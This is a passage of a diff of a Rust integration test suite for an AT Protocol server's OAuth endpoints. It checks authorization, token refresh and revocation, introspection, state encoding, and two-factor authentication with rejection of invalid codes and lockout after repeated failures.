StatusCode::SEE_OTHER 306 - && auth_status != StatusCode::FOUND 307 - { 308 - let auth_text = auth_res.text().await.unwrap_or_default(); 309 - panic!("Expected redirect, got {}: {}", auth_status, auth_text); 310 - } 311 - let location = auth_res 312 - .headers() 313 - .get("location") 314 - .expect("No Location header") 315 - .to_str() 316 - .unwrap(); 317 - assert!( 318 - location.starts_with(redirect_uri), 319 - "Redirect to wrong URI: {}", 320 - location 321 - ); 322 - assert!( 323 - location.contains("code="), 324 - "No code in redirect: {}", 325 - location 326 - ); 327 - assert!( 328 - location.contains(&format!("state={}", state)), 329 - "Wrong state in redirect" 330 - ); 331 - let code = location 332 - .split("code=") 333 - .nth(1) 334 - .unwrap() 335 - .split('&') 336 - .next() 337 - .unwrap(); 338 let token_res = http_client 339 .post(format!("{}/oauth/token", url)) 340 - .form(&[ 341 - ("grant_type", "authorization_code"), 342 - ("code", code), 343 - ("redirect_uri", redirect_uri), 344 - ("code_verifier", &code_verifier), 345 - ("client_id", &client_id), 346 - ]) 347 - .send() 348 - .await 349 - .expect("Token request failed"); 350 - let token_status = token_res.status(); 351 - let token_text = token_res.text().await.unwrap_or_default(); 352 - if token_status != StatusCode::OK { 353 - panic!( 354 - "Token request failed with status {}: {}", 355 - token_status, token_text 356 - ); 357 - } 358 - let token_body: Value = serde_json::from_str(&token_text).unwrap(); 359 assert!(token_body["access_token"].is_string()); 360 assert!(token_body["refresh_token"].is_string()); 361 assert_eq!(token_body["token_type"], "Bearer"); 362 assert!(token_body["expires_in"].is_number()); 363 assert_eq!(token_body["sub"], user_did); 364 - } 365 - #[tokio::test] 366 - async fn test_token_refresh_flow() { 367 - let url = base_url().await; 368 - let http_client = client(); 369 - let ts = Utc::now().timestamp_millis(); 370 - let handle = format!("refresh-test-{}", ts); 371 - let email = format!("refresh-test-{}@example.com", ts); 372 - let password = "refresh-test-password"; 373 - http_client 374 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 375 - .json(&json!({ 376 - "handle": handle, 377 - "email": email, 378 - "password": password 379 - })) 380 - .send() 381 - .await 382 - .expect("Account creation failed"); 383 - let redirect_uri = "https://example.com/refresh-callback"; 384 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 385 - let client_id = mock_client.uri(); 386 - let (code_verifier, code_challenge) = generate_pkce(); 387 - let par_body: Value = http_client 388 - .post(format!("{}/oauth/par", url)) 389 - .form(&[ 390 - ("response_type", "code"), 391 - ("client_id", &client_id), 392 - ("redirect_uri", redirect_uri), 393 - ("code_challenge", &code_challenge), 394 - ("code_challenge_method", "S256"), 395 - ]) 396 - .send() 397 - .await 398 - .unwrap() 399 - .json() 400 - .await 401 - .unwrap(); 402 - let request_uri = par_body["request_uri"].as_str().unwrap(); 403 - let auth_client = no_redirect_client(); 404 - let auth_res = auth_client 405 - .post(format!("{}/oauth/authorize", url)) 406 - .form(&[ 407 - ("request_uri", request_uri), 408 - ("username", &handle), 409 - ("password", password), 410 - ("remember_device", "false"), 411 - ]) 412 - .send() 413 - .await 414 - .unwrap(); 415 - let location = auth_res 416 - .headers() 417 - .get("location") 418 - .unwrap() 419 - .to_str() 420 - .unwrap(); 421 - let code = location 422 - .split("code=") 423 - .nth(1) 424 - .unwrap() 425 - .split('&') 426 - .next() 427 - .unwrap(); 428 - let token_body: Value = http_client 429 - .post(format!("{}/oauth/token", url)) 430 - .form(&[ 431 - ("grant_type", "authorization_code"), 432 - ("code", code), 433 - ("redirect_uri", redirect_uri), 434 - ("code_verifier", &code_verifier), 435 - ("client_id", &client_id), 436 - ]) 437 - .send() 438 - .await 439 - .unwrap() 440 - .json() 441 - .await 442 - .unwrap(); 443 let refresh_token = token_body["refresh_token"].as_str().unwrap(); 444 - let original_access_token = token_body["access_token"].as_str().unwrap(); 445 let refresh_res = http_client 446 .post(format!("{}/oauth/token", url)) 447 - .form(&[ 448 - ("grant_type", "refresh_token"), 449 - ("refresh_token", refresh_token), 450 - ("client_id", &client_id), 451 - ]) 452 - .send() 453 - .await 454 - .expect("Refresh request failed"); 455 assert_eq!(refresh_res.status(), StatusCode::OK); 456 let refresh_body: Value = refresh_res.json().await.unwrap(); 457 - assert!(refresh_body["access_token"].is_string()); 458 - assert!(refresh_body["refresh_token"].is_string()); 459 - let new_access_token = refresh_body["access_token"].as_str().unwrap(); 460 - let new_refresh_token = refresh_body["refresh_token"].as_str().unwrap(); 461 - assert_ne!( 462 - new_access_token, original_access_token, 463 - "Access token should rotate" 464 - ); 465 - assert_ne!( 466 - new_refresh_token, refresh_token, 467 - "Refresh token should rotate" 468 - ); 469 } 470 #[tokio::test] 471 - async fn test_wrong_credentials_denied() { 472 let url = base_url().await; 473 let http_client = client(); 474 let ts = Utc::now().timestamp_millis(); 475 let handle = format!("wrong-creds-{}", ts); 476 let email = format!("wrong-creds-{}@example.com", ts); 477 - let password = "correct-password"; 478 - http_client 479 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 480 - .json(&json!({ 481 - "handle": handle, 482 - "email": email, 483 - "password": password 484 - })) 485 - .send() 486 - .await 487 - .unwrap(); 488 - let redirect_uri = "https://example.com/wrong-creds-callback"; 489 let mock_client = setup_mock_client_metadata(redirect_uri).await; 490 let client_id = mock_client.uri(); 491 let (_, code_challenge) = generate_pkce(); 492 let par_body: Value = http_client 493 .post(format!("{}/oauth/par", url)) 494 - .form(&[ 495 - ("response_type", "code"), 496 - ("client_id", &client_id), 497 - ("redirect_uri", redirect_uri), 498 - ("code_challenge", &code_challenge), 499 - ("code_challenge_method", "S256"), 500 - ]) 501 - .send() 502 - .await 503 - .unwrap() 504 - .json() 505 - .await 506 - .unwrap(); 507 let request_uri = par_body["request_uri"].as_str().unwrap(); 508 let auth_res = http_client 509 .post(format!("{}/oauth/authorize", url)) 510 .header("Accept", "application/json") 511 - .form(&[ 512 - ("request_uri", request_uri), 513 - ("username", &handle), 514 - ("password", "wrong-password"), 515 - ("remember_device", "false"), 516 - ]) 517 - .send() 518 - .await 519 - .unwrap(); 520 assert_eq!(auth_res.status(), StatusCode::FORBIDDEN); 521 let error_body: Value = auth_res.json().await.unwrap(); 522 assert_eq!(error_body["error"], "access_denied"); 523 - } 524 - #[tokio::test] 525 - async fn test_token_revocation() { 526 - let url = base_url().await; 527 - let http_client = client(); 528 - let ts = Utc::now().timestamp_millis(); 529 - let handle = format!("revoke-test-{}", ts); 530 - let email = format!("revoke-test-{}@example.com", ts); 531 - let password = "revoke-test-password"; 532 - http_client 533 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 534 - .json(&json!({ 535 - "handle": handle, 536 - "email": email, 537 - "password": password 538 - })) 539 - .send() 540 - .await 541 - .unwrap(); 542 - let redirect_uri = "https://example.com/revoke-callback"; 543 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 544 - let client_id = mock_client.uri(); 545 - let (code_verifier, code_challenge) = generate_pkce(); 546 - let par_body: Value = http_client 547 - .post(format!("{}/oauth/par", url)) 548 - .form(&[ 549 - ("response_type", "code"), 550 - ("client_id", &client_id), 551 - ("redirect_uri", redirect_uri), 552 - ("code_challenge", &code_challenge), 553 - ("code_challenge_method", "S256"), 554 - ]) 555 - .send() 556 - .await 557 - .unwrap() 558 - .json() 559 - .await 560 - .unwrap(); 561 - let request_uri = par_body["request_uri"].as_str().unwrap(); 562 - let auth_client = no_redirect_client(); 563 - let auth_res = auth_client 564 - .post(format!("{}/oauth/authorize", url)) 565 - .form(&[ 566 - ("request_uri", request_uri), 567 - ("username", &handle), 568 - ("password", password), 569 - ("remember_device", "false"), 570 - ]) 571 - .send() 572 - .await 573 - .unwrap(); 574 - let location = auth_res 575 - .headers() 576 - .get("location") 577 - .unwrap() 578 - .to_str() 579 - .unwrap(); 580 - let code = location 581 - .split("code=") 582 - .nth(1) 583 - .unwrap() 584 - .split('&') 585 - .next() 586 - .unwrap(); 587 - let token_body: Value = http_client 588 .post(format!("{}/oauth/token", url)) 589 - .form(&[ 590 - ("grant_type", "authorization_code"), 591 - ("code", code), 592 - ("redirect_uri", redirect_uri), 593 - ("code_verifier", &code_verifier), 594 - ("client_id", &client_id), 595 - ]) 596 - .send() 597 - .await 598 - .unwrap() 599 - .json() 600 - .await 601 - .unwrap(); 602 - let refresh_token = token_body["refresh_token"].as_str().unwrap(); 603 - let revoke_res = http_client 604 - .post(format!("{}/oauth/revoke", url)) 605 - .form(&[("token", refresh_token)]) 606 - .send() 607 - .await 608 - .unwrap(); 609 - assert_eq!(revoke_res.status(), StatusCode::OK); 610 - let refresh_after_revoke = http_client 611 - .post(format!("{}/oauth/token", url)) 612 - .form(&[ 613 - ("grant_type", "refresh_token"), 614 - ("refresh_token", refresh_token), 615 - ("client_id", &client_id), 616 - ]) 617 - .send() 618 - .await 619 - .unwrap(); 620 - assert_eq!(refresh_after_revoke.status(), StatusCode::BAD_REQUEST); 621 - } 622 - #[tokio::test] 623 - async fn test_unsupported_grant_type() { 624 - let url = base_url().await; 625 - let http_client = client(); 626 - let res = http_client 627 - .post(format!("{}/oauth/token", url)) 628 - .form(&[ 629 - ("grant_type", "client_credentials"), 630 - ("client_id", "https://example.com"), 631 - ]) 632 - .send() 633 - .await 634 - .unwrap(); 635 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 636 - let body: Value = res.json().await.unwrap(); 637 assert_eq!(body["error"], "unsupported_grant_type"); 638 - } 639 - #[tokio::test] 640 - async fn test_invalid_refresh_token() { 641 - let url = base_url().await; 642 - let http_client = client(); 643 - let res = http_client 644 .post(format!("{}/oauth/token", url)) 645 - .form(&[ 646 - ("grant_type", "refresh_token"), 647 - ("refresh_token", "invalid-refresh-token"), 648 - ("client_id", "https://example.com"), 649 - ]) 650 - .send() 651 - .await 652 - .unwrap(); 653 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 654 - let body: Value = res.json().await.unwrap(); 655 assert_eq!(body["error"], "invalid_grant"); 656 - } 657 - #[tokio::test] 658 - async fn test_expired_authorization_request() { 659 - let url = base_url().await; 660 - let http_client = client(); 661 - let res = http_client 662 - .get(format!("{}/oauth/authorize", url)) 663 - .header("Accept", "application/json") 664 - .query(&[( 665 - "request_uri", 666 - "urn:ietf:params:oauth:request_uri:expired-or-nonexistent", 667 - )]) 668 - .send() 669 - .await 670 - .unwrap(); 671 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 672 - let body: Value = res.json().await.unwrap(); 673 - assert_eq!(body["error"], "invalid_request"); 674 - } 675 - #[tokio::test] 676 - async fn test_token_introspection() { 677 - let url = base_url().await; 678 - let http_client = client(); 679 - let ts = Utc::now().timestamp_millis(); 680 - let handle = format!("introspect-{}", ts); 681 - let email = format!("introspect-{}@example.com", ts); 682 - let password = "introspect-password"; 683 - http_client 684 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 685 - .json(&json!({ 686 - "handle": handle, 687 - "email": email, 688 - "password": password 689 - })) 690 - .send() 691 - .await 692 - .unwrap(); 693 - let redirect_uri = "https://example.com/introspect-callback"; 694 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 695 - let client_id = mock_client.uri(); 696 - let (code_verifier, code_challenge) = generate_pkce(); 697 - let par_body: Value = http_client 698 - .post(format!("{}/oauth/par", url)) 699 - .form(&[ 700 - ("response_type", "code"), 701 - ("client_id", &client_id), 702 - ("redirect_uri", redirect_uri), 703 - ("code_challenge", &code_challenge), 704 - ("code_challenge_method", "S256"), 705 - ]) 706 - .send() 707 - .await 708 - .unwrap() 709 - .json() 710 - .await 711 - .unwrap(); 712 - let request_uri = par_body["request_uri"].as_str().unwrap(); 713 - let auth_client = no_redirect_client(); 714 - let auth_res = auth_client 715 - .post(format!("{}/oauth/authorize", url)) 716 - .form(&[ 717 - ("request_uri", request_uri), 718 - ("username", &handle), 719 - ("password", password), 720 - ("remember_device", "false"), 721 - ]) 722 - .send() 723 - .await 724 - .unwrap(); 725 - let location = auth_res 726 - .headers() 727 - .get("location") 728 - .unwrap() 729 - .to_str() 730 - .unwrap(); 731 - let code = location 732 - .split("code=") 733 - .nth(1) 734 - .unwrap() 735 - .split('&') 736 - .next() 737 - .unwrap(); 738 - let token_body: Value = http_client 739 - .post(format!("{}/oauth/token", url)) 740 - .form(&[ 741 - ("grant_type", "authorization_code"), 742 - ("code", code), 743 - ("redirect_uri", redirect_uri), 744 - ("code_verifier", &code_verifier), 745 - ("client_id", &client_id), 746 - ]) 747 - .send() 748 - .await 749 - .unwrap() 750 - .json() 751 - .await 752 - .unwrap(); 753 - let access_token = token_body["access_token"].as_str().unwrap(); 754 - let introspect_res = http_client 755 - .post(format!("{}/oauth/introspect", url)) 756 - .form(&[("token", access_token)]) 757 - .send() 758 - .await 759 - .unwrap(); 760 - assert_eq!(introspect_res.status(), StatusCode::OK); 761 - let introspect_body: Value = introspect_res.json().await.unwrap(); 762 - assert_eq!(introspect_body["active"], true); 763 - assert!(introspect_body["client_id"].is_string()); 764 - assert!(introspect_body["exp"].is_number()); 765 - } 766 - #[tokio::test] 767 - async fn test_introspect_invalid_token() { 768 - let url = base_url().await; 769 - let http_client = client(); 770 - let res = http_client 771 .post(format!("{}/oauth/introspect", url)) 772 .form(&[("token", "invalid.token.here")]) 773 - .send() 774 - .await 775 - .unwrap(); 776 - assert_eq!(res.status(), StatusCode::OK); 777 - let body: Value = res.json().await.unwrap(); 778 assert_eq!(body["active"], false); 779 - } 780 - #[tokio::test] 781 - async fn test_introspect_revoked_token() { 782 - let url = base_url().await; 783 - let http_client = client(); 784 - let ts = Utc::now().timestamp_millis(); 785 - let handle = format!("introspect-revoked-{}", ts); 786 - let email = format!("introspect-revoked-{}@example.com", ts); 787 - let password = "introspect-revoked-password"; 788 - http_client 789 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 790 - .json(&json!({ 791 - "handle": handle, 792 - "email": email, 793 - "password": password 794 - })) 795 - .send() 796 - .await 797 - .unwrap(); 798 - let redirect_uri = "https://example.com/introspect-revoked-callback"; 799 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 800 - let client_id = mock_client.uri(); 801 - let (code_verifier, code_challenge) = generate_pkce(); 802 - let par_body: Value = http_client 803 - .post(format!("{}/oauth/par", url)) 804 - .form(&[ 805 - ("response_type", "code"), 806 - ("client_id", &client_id), 807 - ("redirect_uri", redirect_uri), 808 - ("code_challenge", &code_challenge), 809 - ("code_challenge_method", "S256"), 810 - ]) 811 - .send() 812 - .await 813 - .unwrap() 814 - .json() 815 - .await 816 - .unwrap(); 817 - let request_uri = par_body["request_uri"].as_str().unwrap(); 818 - let auth_client = no_redirect_client(); 819 - let auth_res = auth_client 820 - .post(format!("{}/oauth/authorize", url)) 821 - .form(&[ 822 - ("request_uri", request_uri), 823 - ("username", &handle), 824 - ("password", password), 825 - ("remember_device", "false"), 826 - ]) 827 - .send() 828 - .await 829 - .unwrap(); 830 - let location = auth_res 831 - .headers() 832 - .get("location") 833 - .unwrap() 834 - .to_str() 835 - .unwrap(); 836 - let code = location 837 - .split("code=") 838 - .nth(1) 839 - .unwrap() 840 - .split('&') 841 - .next() 842 - .unwrap(); 843 - let token_body: Value = http_client 844 - .post(format!("{}/oauth/token", url)) 845 - .form(&[ 846 - ("grant_type", "authorization_code"), 847 - ("code", code), 848 - ("redirect_uri", redirect_uri), 849 - ("code_verifier", &code_verifier), 850 - ("client_id", &client_id), 851 - ]) 852 - .send() 853 - .await 854 - .unwrap() 855 - .json() 856 - .await 857 - .unwrap(); 858 - let access_token = token_body["access_token"].as_str().unwrap(); 859 - let refresh_token = token_body["refresh_token"].as_str().unwrap(); 860 - http_client 861 - .post(format!("{}/oauth/revoke", url)) 862 - .form(&[("token", refresh_token)]) 863 - .send() 864 - .await 865 - .unwrap(); 866 - let introspect_res = http_client 867 - .post(format!("{}/oauth/introspect", url)) 868 - .form(&[("token", access_token)]) 869 - .send() 870 - .await 871 - .unwrap(); 872 - assert_eq!(introspect_res.status(), StatusCode::OK); 873 - let body: Value = introspect_res.json().await.unwrap(); 874 - assert_eq!(body["active"], false, "Revoked token should be inactive"); 875 } 876 - #[tokio::test] 877 - async fn test_state_with_special_chars() { 878 - let url = base_url().await; 879 - let http_client = client(); 880 - let ts = Utc::now().timestamp_millis(); 881 - let handle = format!("state-special-{}", ts); 882 - let email = format!("state-special-{}@example.com", ts); 883 - let password = "state-special-password"; 884 - http_client 885 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 886 - .json(&json!({ 887 - "handle": handle, 888 - "email": email, 889 - "password": password 890 - })) 891 - .send() 892 - .await 893 - .unwrap(); 894 - let redirect_uri = "https://example.com/state-special-callback"; 895 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 896 - let client_id = mock_client.uri(); 897 - let (_code_verifier, code_challenge) = generate_pkce(); 898 - let special_state = "state=with&special=chars&plus+more"; 899 - let par_body: Value = http_client 900 - .post(format!("{}/oauth/par", url)) 901 - .form(&[ 902 - ("response_type", "code"), 903 - ("client_id", &client_id), 904 - ("redirect_uri", redirect_uri), 905 - ("code_challenge", &code_challenge), 906 - ("code_challenge_method", "S256"), 907 - ("state", special_state), 908 - ]) 909 - .send() 910 - .await 911 - .unwrap() 912 - .json() 913 - .await 914 - .unwrap(); 915 - let request_uri = par_body["request_uri"].as_str().unwrap(); 916 - let auth_client = no_redirect_client(); 917 - let auth_res = auth_client 918 - .post(format!("{}/oauth/authorize", url)) 919 - .form(&[ 920 - ("request_uri", request_uri), 921 - ("username", &handle), 922 - ("password", password), 923 - ("remember_device", "false"), 924 - ]) 925 - .send() 926 - .await 927 - .unwrap(); 928 - assert!( 929 - auth_res.status().is_redirection(), 930 - "Should redirect even with special chars in state" 931 - ); 932 - let location = auth_res 933 - .headers() 934 - .get("location") 935 - .unwrap() 936 - .to_str() 937 - .unwrap(); 938 - assert!( 939 - location.contains("state="), 940 - "State should be in redirect URL" 941 - ); 942 - let encoded_state = urlencoding::encode(special_state); 943 - assert!( 944 - location.contains(&format!("state={}", encoded_state)), 945 - "State should be URL-encoded. Got: {}", 946 - location 947 - ); 948 - } 949 #[tokio::test] 950 - async fn test_2fa_required_when_enabled() { 951 let url = base_url().await; 952 let http_client = client(); 953 let ts = Utc::now().timestamp_millis(); 954 - let handle = format!("2fa-required-{}", ts); 955 - let email = format!("2fa-required-{}@example.com", ts); 956 let password = "2fa-test-password"; 957 let create_res = http_client 958 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 959 - .json(&json!({ 960 - "handle": handle, 961 - "email": email, 962 - "password": password 963 - })) 964 - .send() 965 - .await 966 - .unwrap(); 967 assert_eq!(create_res.status(), StatusCode::OK); 968 let account: Value = create_res.json().await.unwrap(); 969 let user_did = account["did"].as_str().unwrap(); 970 - let db_url = common::get_db_connection_string().await; 971 - let pool = sqlx::postgres::PgPoolOptions::new() 972 - .max_connections(1) 973 - .connect(&db_url) 974 - .await 975 - .expect("Failed to connect to database"); 976 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 977 - .bind(user_did) 978 - .execute(&pool) 979 - .await 980 - .expect("Failed to enable 2FA"); 981 let redirect_uri = "https://example.com/2fa-callback"; 982 let mock_client = setup_mock_client_metadata(redirect_uri).await; 983 let client_id = mock_client.uri(); 984 - let (_, code_challenge) = generate_pkce(); 985 let par_body: Value = http_client 986 .post(format!("{}/oauth/par", url)) 987 - .form(&[ 988 - ("response_type", "code"), 989 - ("client_id", &client_id), 990 - ("redirect_uri", redirect_uri), 991 - ("code_challenge", &code_challenge), 992 - ("code_challenge_method", "S256"), 993 - ]) 994 - .send() 995 - .await 996 - .unwrap() 997 - .json() 998 - .await 999 - .unwrap(); 1000 let request_uri = par_body["request_uri"].as_str().unwrap(); 1001 let auth_client = no_redirect_client(); 1002 let auth_res = auth_client 1003 .post(format!("{}/oauth/authorize", url)) 1004 - .form(&[ 1005 - ("request_uri", request_uri), 1006 - ("username", &handle), 1007 - ("password", password), 1008 - ("remember_device", "false"), 1009 - ]) 1010 - .send() 1011 - .await 1012 - .unwrap(); 1013 - assert!( 1014 - auth_res.status().is_redirection(), 1015 - "Should redirect to 2FA page, got status: {}", 1016 - auth_res.status() 1017 - ); 1018 - let location = auth_res 1019 - .headers() 1020 - .get("location") 1021 - .unwrap() 1022 - .to_str() 1023 - .unwrap(); 1024 - assert!( 1025 - location.contains("/oauth/authorize/2fa"), 1026 - "Should redirect to 2FA page, got: {}", 1027 - location 1028 - ); 1029 - assert!( 1030 - location.contains("request_uri="), 1031 - "2FA redirect should include request_uri" 1032 - ); 1033 - } 1034 - #[tokio::test] 1035 - async fn test_2fa_invalid_code_rejected() { 1036 - let url = base_url().await; 1037 - let http_client = client(); 1038 - let ts = Utc::now().timestamp_millis(); 1039 - let handle = format!("2fa-invalid-{}", ts); 1040 - let email = format!("2fa-invalid-{}@example.com", ts); 1041 - let password = "2fa-test-password"; 1042 - let create_res = http_client 1043 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 1044 - .json(&json!({ 1045 - "handle": handle, 1046 - "email": email, 1047 - "password": password 1048 - })) 1049 - .send() 1050 - .await 1051 - .unwrap(); 1052 - assert_eq!(create_res.status(), StatusCode::OK); 1053 - let account: Value = create_res.json().await.unwrap(); 1054 - let user_did = account["did"].as_str().unwrap(); 1055 - let db_url = common::get_db_connection_string().await; 1056 - let pool = sqlx::postgres::PgPoolOptions::new() 1057 - .max_connections(1) 1058 - .connect(&db_url) 1059 - .await 1060 - .expect("Failed to connect to database"); 1061 - sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 1062 - .bind(user_did) 1063 - .execute(&pool) 1064 - .await 1065 - .expect("Failed to enable 2FA"); 1066 - let redirect_uri = "https://example.com/2fa-invalid-callback"; 1067 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 1068 - let client_id = mock_client.uri(); 1069 - let (_, code_challenge) = generate_pkce(); 1070 - let par_body: Value = http_client 1071 - .post(format!("{}/oauth/par", url)) 1072 - .form(&[ 1073 - ("response_type", "code"), 1074 - ("client_id", &client_id), 1075 - ("redirect_uri", redirect_uri), 1076 - ("code_challenge", &code_challenge), 1077 - ("code_challenge_method", "S256"), 1078 - ]) 1079 - .send() 1080 - .await 1081 - .unwrap() 1082 - .json() 1083 - .await 1084 - .unwrap(); 1085 - let request_uri = par_body["request_uri"].as_str().unwrap(); 1086 - let auth_client = no_redirect_client(); 1087 - let auth_res = auth_client 1088 - .post(format!("{}/oauth/authorize", url)) 1089 - .form(&[ 1090 - ("request_uri", request_uri), 1091 - ("username", &handle), 1092 - ("password", password), 1093 - ("remember_device", "false"), 1094 - ]) 1095 - .send() 1096 - .await 1097 - .unwrap(); 1098 - assert!(auth_res.status().is_redirection()); 1099 - let location = auth_res 1100 - .headers() 1101 - .get("location") 1102 - .unwrap() 1103 - .to_str() 1104 - .unwrap(); 1105 - assert!(location.contains("/oauth/authorize/2fa")); 1106 - let twofa_res = http_client 1107 .post(format!("{}/oauth/authorize/2fa", url)) 1108 .form(&[("request_uri", request_uri), ("code", "000000")]) 1109 - .send() 1110 - .await 1111 - .unwrap(); 1112 - assert_eq!(twofa_res.status(), StatusCode::OK); 1113 - let body = twofa_res.text().await.unwrap(); 1114 - assert!( 1115 - body.contains("Invalid verification code") || body.contains("invalid"), 1116 - "Should show error for invalid code" 1117 - ); 1118 - } 1119 - #[tokio::test] 1120 - async fn test_2fa_valid_code_completes_auth() { 1121 - let url = base_url().await; 1122 - let http_client = client(); 1123 - let ts = Utc::now().timestamp_millis(); 1124 - let handle = format!("2fa-valid-{}", ts); 1125 - let email = format!("2fa-valid-{}@example.com", ts); 1126 - let password = "2fa-test-password"; 1127 - let create_res = http_client 1128 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 1129 - .json(&json!({ 1130 - "handle": handle, 1131 - "email": email, 1132 - "password": password 1133 - })) 1134 - .send() 1135 - .await 1136 - .unwrap(); 1137 - assert_eq!(create_res.status(), StatusCode::OK); 1138 - let account: Value = create_res.json().await.unwrap(); 1139 - let user_did = account["did"].as_str().unwrap(); 1140 - let db_url = common::get_db_connection_string().await; 1141 - let pool = sqlx::postgres::PgPoolOptions::new() 1142 - .max_connections(1) 1143 - .connect(&db_url) 1144 - .await 1145 - .expect("Failed to connect to database"); 1146 - sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 1147 - .bind(user_did) 1148 - .execute(&pool) 1149 - .await 1150 - .expect("Failed to enable 2FA"); 1151 - let redirect_uri = "https://example.com/2fa-valid-callback"; 1152 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 1153 - let client_id = mock_client.uri(); 1154 - let (code_verifier, code_challenge) = generate_pkce(); 1155 - let par_body: Value = http_client 1156 - .post(format!("{}/oauth/par", url)) 1157 - .form(&[ 1158 - ("response_type", "code"), 1159 - ("client_id", &client_id), 1160 - ("redirect_uri", redirect_uri), 1161 - ("code_challenge", &code_challenge), 1162 - ("code_challenge_method", "S256"), 1163 - ]) 1164 - .send() 1165 - .await 1166 - .unwrap() 1167 - .json() 1168 - .await 1169 - .unwrap(); 1170 - let request_uri = par_body["request_uri"].as_str().unwrap(); 1171 - let auth_client = no_redirect_client(); 1172 - let auth_res = auth_client 1173 - .post(format!("{}/oauth/authorize", url)) 1174 - .form(&[ 1175 - ("request_uri", request_uri), 1176 - ("username", &handle), 1177 - ("password", password), 1178 - ("remember_device", "false"), 1179 - ]) 1180 - .send() 1181 - .await 1182 - .unwrap(); 1183 - assert!(auth_res.status().is_redirection()); 1184 - let twofa_code: String = 1185 - sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 1186 - .bind(request_uri) 1187 - .fetch_one(&pool) 1188 - .await 1189 - .expect("Failed to get 2FA code from database"); 1190 let twofa_res = auth_client 1191 .post(format!("{}/oauth/authorize/2fa", url)) 1192 .form(&[("request_uri", request_uri), ("code", &twofa_code)]) 1193 - .send() 1194 - .await 1195 - .unwrap(); 1196 - assert!( 1197 - twofa_res.status().is_redirection(), 1198 - "Valid 2FA code should redirect to success, got status: {}", 1199 - twofa_res.status() 1200 - ); 1201 - let location = twofa_res 1202 - .headers() 1203 - .get("location") 1204 - .unwrap() 1205 - .to_str() 1206 - .unwrap(); 1207 - assert!( 1208 - location.starts_with(redirect_uri), 1209 - "Should redirect to client callback, got: {}", 1210 - location 1211 - ); 1212 - assert!( 1213 - location.contains("code="), 1214 - "Redirect should include authorization code" 1215 - ); 1216 - let auth_code = location 1217 - .split("code=") 1218 - .nth(1) 1219 - .unwrap() 1220 - .split('&') 1221 - .next() 1222 - .unwrap(); 1223 let token_res = http_client 1224 .post(format!("{}/oauth/token", url)) 1225 - .form(&[ 1226 - ("grant_type", "authorization_code"), 1227 - ("code", auth_code), 1228 - ("redirect_uri", redirect_uri), 1229 - ("code_verifier", &code_verifier), 1230 - ("client_id", &client_id), 1231 - ]) 1232 - .send() 1233 - .await 1234 - .unwrap(); 1235 - assert_eq!( 1236 - token_res.status(), 1237 - StatusCode::OK, 1238 - "Token exchange should succeed" 1239 - ); 1240 let token_body: Value = token_res.json().await.unwrap(); 1241 - assert!(token_body["access_token"].is_string()); 1242 assert_eq!(token_body["sub"], user_did); 1243 } 1244 #[tokio::test] 1245 - async fn test_2fa_lockout_after_max_attempts() { 1246 let url = base_url().await; 1247 let http_client = client(); 1248 let ts = Utc::now().timestamp_millis(); ··· 1251 let password = "2fa-test-password"; 1252 let create_res = http_client 1253 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 1254 - .json(&json!({ 1255 - "handle": handle, 1256 - "email": email, 1257 - "password": password 1258 - })) 1259 - .send() 1260 - .await 1261 - .unwrap(); 1262 - assert_eq!(create_res.status(), StatusCode::OK); 1263 let account: Value = create_res.json().await.unwrap(); 1264 let user_did = account["did"].as_str().unwrap(); 1265 - let db_url = common::get_db_connection_string().await; 1266 - let pool = sqlx::postgres::PgPoolOptions::new() 1267 - .max_connections(1) 1268 - .connect(&db_url) 1269 - .await 1270 - .expect("Failed to connect to database"); 1271 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 1272 - .bind(user_did) 1273 - .execute(&pool) 1274 - .await 1275 - .expect("Failed to enable 2FA"); 1276 let redirect_uri = "https://example.com/2fa-lockout-callback"; 1277 let mock_client = setup_mock_client_metadata(redirect_uri).await; 1278 let client_id = mock_client.uri(); 1279 let (_, code_challenge) = generate_pkce(); 1280 let par_body: Value = http_client 1281 .post(format!("{}/oauth/par", url)) 1282 - .form(&[ 1283 - ("response_type", "code"), 1284 - ("client_id", &client_id), 1285 - ("redirect_uri", redirect_uri), 1286 - ("code_challenge", &code_challenge), 1287 - ("code_challenge_method", "S256"), 1288 - ]) 1289 - .send() 1290 - .await 1291 - .unwrap() 1292 - .json() 1293 - .await 1294 - .unwrap(); 1295 let request_uri = par_body["request_uri"].as_str().unwrap(); 1296 let auth_client = no_redirect_client(); 1297 let auth_res = auth_client 1298 .post(format!("{}/oauth/authorize", url)) 1299 - .form(&[ 1300 - ("request_uri", request_uri), 1301 - ("username", &handle), 1302 - ("password", password), 1303 - ("remember_device", "false"), 1304 - ]) 1305 - .send() 1306 - .await 1307 - .unwrap(); 1308 assert!(auth_res.status().is_redirection()); 1309 for i in 0..5 { 1310 let res = http_client 1311 .post(format!("{}/oauth/authorize/2fa", url)) 1312 .form(&[("request_uri", request_uri), ("code", "999999")]) 1313 - .send() 1314 - .await 1315 - .unwrap(); 1316 if i < 4 { 1317 - assert_eq!( 1318 - res.status(), 1319 - StatusCode::OK, 1320 - "Attempt {} should show error page", 1321 - i + 1 1322 - ); 1323 - let body = res.text().await.unwrap(); 1324 - assert!( 1325 - body.contains("Invalid verification code"), 1326 - "Should show invalid code error on attempt {}", 1327 - i + 1 1328 - ); 1329 } 1330 } 1331 